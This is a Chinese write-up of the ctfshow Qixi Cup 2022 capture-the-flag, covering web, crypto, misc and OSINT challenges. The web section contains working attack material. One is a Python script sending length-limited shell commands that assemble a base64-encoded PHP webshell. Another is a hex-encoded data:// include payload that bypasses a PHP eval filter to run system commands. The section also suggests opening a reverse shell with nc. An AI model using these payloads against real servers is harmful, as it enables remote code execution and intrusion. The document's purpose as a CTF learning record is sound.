ctfshow七夕杯2022

文章目录

• • Web
  • • web签到
    • easy_calc
    • easy_cmd
  • Crypto
  • • 密码签到
  • Misc
  • • 杂项签到
  • Osint
  • • 社工签到
    • 迷失的大象
    • 大飞机

原文

Web

web签到

固定长度RCE，限定7位数字，直接给出exp

# -*- coding: utf-8 -*-# @Time : 2022/8/4 22:03# @Author : pysnow# !/usr/bin/python# -*- coding: UTF-8 -*-import timeimport requestsurl = "http://4432ad06-416e-4375-9e8a-e8499e9bb8cb.challenge.ctf.show/api/tools.php"print("[+]start attack!!!")with open("payload.txt", "r") as f:    for i in f:        print("[*]" + url.format(i.strip()))        data = {"cmd": i.strip()}        res = requests.post(url, data=data)        time.sleep(3)        print(res.text)test = requests.get("http://172d5c73-1dfe-4f7c-b39e-599a19aba8df.challenge.ctf.show/api/1.php")if test.status_code == requests.codes.ok:    print("[*]Attack success!!!")

>hp>1.p\\>d\>\\>\ -\\>e64\\>bas\\>7\|\\>XSk\\>Fsx\\>dFV\\>kX0\\>bCg\\>XZh\\>AgZ\\>waH\\>PD9\\>o\ \\>ech\\ls -t>0sh 0

因为网络问题，每一条命令执行的时间都相近，所以要加一个延时，堵塞一下，保证文件名的顺序正确

然后访问1.php，RCE就行

easy_calc

源码

 <?phpif(check($code)){    eval('$result='."$code".";");    echo($result);  }function check(&$code){    $num1=$_POST['num1'];    $symbol=$_POST['symbol'];    $num2=$_POST['num2'];    if(!isset($num1) || !isset($num2) || !isset($symbol) ){        return false;    }    if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol)){        return false;    }    if(preg_match("/^[\+\-\*\/]$/", $symbol)){        $code = "$num1$symbol$num2";        return true;    }    return false;}

一个传三个参数，其中两个数字，一个符号，分号这些没过滤，可以执行多个命令，所以寻找最容易绕过的地方，也就是num12

/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/

过滤了很多符号，最重要的用来执行函数的括号也给过滤了，但是有个东西执行是不需要括号的，那就是文件包含

include "1.php" == include("1.php");include "data://text/plain," == phpinfo();

这里data内容可以使用hex编码绕过，即最终payload如下

num1=include "\x64\x61\x74\x61\x3a\x2f\x2f\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x61\x74\x20\x2f\x73\x65\x63\x72\x65\x74\x27\x29\x3b\x3f\x3e";&symbol=%2D&num2=1

flag在/secret

easy_cmd

源码

error_reporting(0);highlight_file(__FILE__);$cmd=$_POST['cmd'];if(preg_match("/^\b(ping|ls|nc|ifconfig)\b/",$cmd)){        exec(escapeshellcmd($cmd));}?>

白名单，只给了ping ls ifconfig nc四个命令，由于这道题出网，所以可以直接用nc反弹shell

Crypto

密码签到

** 密文：y3rmc2hvd3tjcnlwdg9fc2lnbmlux2lzx2vhc3l9-a0004008a0**

描述：大牛在今年的hvv过程中，渗透进某业务系统，发现了密文,可是不知道如何解出明文，你能帮他找出来吗？ 已知密文由两部分组成，后面的推测为秘钥

base64解一下，然后直接因为解出来的结果比较特殊，可以直接通过句意猜测出flag

ctfshow{crypto_signin_is_easy}

Misc

杂项签到

010打开，在文件结尾出有flag

Osint

社工签到

给了一张图，要求找到图中所在的位置，通过观察图片可以发现这是一个微博博主发的

本来做题的时候是直接找到了跟这个原图很相似的博文，结果后面补wp的时候又找不到了，所以直接百度识图吧

天涯镇 or 天涯小镇

迷失的大象

百度识图一把梭

ctfshow{墨江哈尼族自治县}

大飞机

同样是百度识图，找到一个贴吧

因为航班太久远了，所以搜索不到航班，尝试搜索另外一张图片找到了下面这篇知乎匿名回答，用的是原图，其中的评论区答案就是航班号

ctfshow{CA981}

来源地址：https://blog.csdn.net/not_code_god/article/details/126199298